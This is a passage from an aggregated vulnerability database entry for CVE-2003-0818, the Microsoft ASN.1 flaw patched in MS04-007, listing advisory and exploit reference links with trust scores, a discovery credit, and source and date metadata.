url:http://jvn.jp/tr/trta04-041a/

Trust: 0.8

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818

Trust: 0.8

url:http://www.securityfocus.com/bid/9635

Trust: 0.8

url:http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf

Trust: 0.8

url:http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html

Trust: 0.8

url:http://www.cyberpolice.go.jp/important/20040211_084159.html

Trust: 0.8

url:http://www.phreedom.org/solar/exploits/msasn1-bitstring/

Trust: 0.3

url:http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html

Trust: 0.3

url:/archive/1/353320

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.exploit-db.com/exploits/153/

Trust: 0.1

url:https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill

Trust: 0.1

url:http://metasploit.com/framework/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2003-0818

Trust: 0.1

url:http://www.phreedom.org/solar/exploits/msasn1-bitstring/

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/583108

Trust: 0.1

url:http://microsoft.com/technet/security/bulletin/ms04-007.asp

Trust: 0.1

url:http://support.microsoft.com/default.aspx?scid=252648

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/216324

Trust: 0.1

url:http://www.eeye.com/html/research/advisories/ad20040210.html

Trust: 0.1

url:http://www.us-cert.gov/cas/techalerts/ta04-041a.html

Trust: 0.1

url:http://www.eeye.com/html/research/advisories/ad20040210-2.html

Trust: 0.1

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // PACKETSTORM: 83044 // PACKETSTORM: 32667 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

CREDITS

Discovery of this vulnerability has been credited to eEye Digital Security.

Trust: 0.6

sources: BID: 9633 // BID: 9635

SOURCES

db: CERT/CC  id: VU#583108
db: CERT/CC  id: VU#216324
db: VULMON  id: CVE-2003-0818
db: BID  id: 13300
db: BID  id: 9633
db: BID  id: 9635
db: JVNDB  id: JVNDB-2004-000037
db: PACKETSTORM  id: 83044
db: PACKETSTORM  id: 32667
db: CNNVD  id: CNNVD-200403-040
db: NVD  id: CVE-2003-0818

LAST UPDATE DATE

2024-08-14T12:57:20.421000+00:00


SOURCES UPDATE DATE

db: CERT/CC  id: VU#583108  date: 2004-02-10T00:00:00
db: CERT/CC  id: VU#216324  date: 2004-02-11T00:00:00
db: VULMON  id: CVE-2003-0818  date: 2019-04-30T00:00:00
db: BID  id: 13300  date: 2009-07-12T14:06:00
db: BID  id: 9633  date: 2009-07-12T02:06:00
db: BID  id: 9635  date: 2009-07-12T02:06:00
db: JVNDB  id: JVNDB-2004-000037  date: 2007-04-01T00:00:00
db: CNNVD  id: CNNVD-200403-040  date: 2019-05-05T00:00:00
db: NVD  id: CVE-2003-0818  date: 2019-04-30T14:27:13.710

SOURCES RELEASE DATE

db: CERT/CC  id: VU#583108  date: 2004-02-10T00:00:00
db: CERT/CC  id: VU#216324  date: 2004-02-10T00:00:00
db: VULMON  id: CVE-2003-0818  date: 2004-03-03T00:00:00
db: BID  id: 13300  date: 2005-04-21T00:00:00
db: BID  id: 9633  date: 2004-02-10T00:00:00
db: BID  id: 9635  date: 2004-02-10T00:00:00
db: JVNDB  id: JVNDB-2004-000037  date: 2007-04-01T00:00:00
db: PACKETSTORM  id: 83044  date: 2009-11-26T00:34:53
db: PACKETSTORM  id: 32667  date: 2004-02-11T02:24:00
db: CNNVD  id: CNNVD-200403-040  date: 2003-11-11T00:00:00
db: NVD  id: CVE-2003-0818  date: 2004-03-03T05:00:00